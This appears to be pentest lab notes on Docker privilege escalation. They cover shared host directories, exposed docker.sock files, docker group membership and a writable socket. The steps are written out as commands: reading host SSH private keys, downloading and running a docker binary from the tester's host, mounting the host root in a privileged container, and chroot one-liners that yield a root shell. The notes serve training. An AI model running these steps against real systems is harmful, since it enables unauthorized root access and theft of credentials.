Docker

Docker Privilege Escalation

Docker Shared Directories

Sample Exploitation

1. Find Files

   $ cd /hostsystem/home/cry0l1t3
   root@container:/hostsystem/home/cry0l1t3$ ls -l
   
   -rw-------  1 cry0l1t3 cry0l1t3  12559 Jun 30 15:09 .bash_history
   -rw-r--r--  1 cry0l1t3 cry0l1t3    220 Jun 30 15:09 .bash_logout
   -rw-r--r--  1 cry0l1t3 cry0l1t3   3771 Jun 30 15:09 .bashrc
   drwxr-x--- 10 cry0l1t3 cry0l1t3   4096 Jun 30 15:09 .ssh
   
   
   

2. You found ssh key and now you can login

   $ cat .ssh/id_rsa
   
   -----BEGIN RSA PRIVATE KEY-----
   <SNIP>

Docker Sockets

A special file that allows the docker client to communicate with the docker daemon

Sample Exploitation

1. We found a docker.sock file

   $ ls -al
   
   total 8
   drwxr-xr-x 1 htb-student htb-student 4096 Jun 30 15:12 .
   drwxr-xr-x 1 root        root        4096 Jun 30 15:12 ..
   srw-rw---- 1 root        root           0 Jun 30 15:27 docker.sock

2. Use docker (download from here) to interact with the socket

   $ wget https://<parrot-os>:443/docker -O docker
   $ chmod +x docker
   $ ls -l
   
   -rwxr-xr-x 1 htb-student htb-student 0 Jun 30 15:27 docker
   
   
   $ /tmp/docker -H unix:///app/docker.sock ps
   
   CONTAINER ID     IMAGE         COMMAND                 CREATED       STATUS           PORTS     NAMES
   3fe8a4782311     main_app      "/docker-entry.s..."    3 days ago    Up 12 minutes    443/tcp   app
   <SNIP>

3. Create our own Docker container that maps the host’s root directory (/) to the /hostsystem directory on the container

   $ /tmp/docker -H unix:///app/docker.sock run --rm -d --privileged -v /:/hostsystem main_app
   $ /tmp/docker -H unix:///app/docker.sock ps
   
   CONTAINER ID     IMAGE         COMMAND                 CREATED           STATUS           PORTS     NAMES
   7ae3bcc818af     main_app      "/docker-entry.s..."    12 seconds ago    Up 8 seconds     443/tcp   app
   3fe8a4782311     main_app      "/docker-entry.s..."    3 days ago        Up 17 minutes    443/tcp   app
   <SNIP>

4. Login to the new container

   $ /tmp/docker -H unix:///app/docker.sock exec -it 7ae3bcc818af /bin/bash
   
   
   # cat /hostsystem/root/.ssh/id_rsa
   
   -----BEGIN RSA PRIVATE KEY-----
   <SNIP>

Docker Group

Sample Exploitation

1. We must be in the docker group. (or docker has SUID set or we are included in the sudoers file that can run docker as root)

   $ id
   
   uid=1000(docker-user) gid=1000(docker-user) groups=1000(docker-user),116(docker)

2. With this, we can run commands like

   $ docker image ls
   
   REPOSITORY                           TAG                 IMAGE ID       CREATED         SIZE
   ubuntu                               20.04               20fffa419e3a   2 days ago    72.8MB

3. Run this command (from gtfobins, use alpine or the image id from step 2)

   $ docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Docker Socket

This occurs when we are not in root/docker group but docker.sock is writable. The default path for this is /var/run/docker.sock

$ docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt bash
#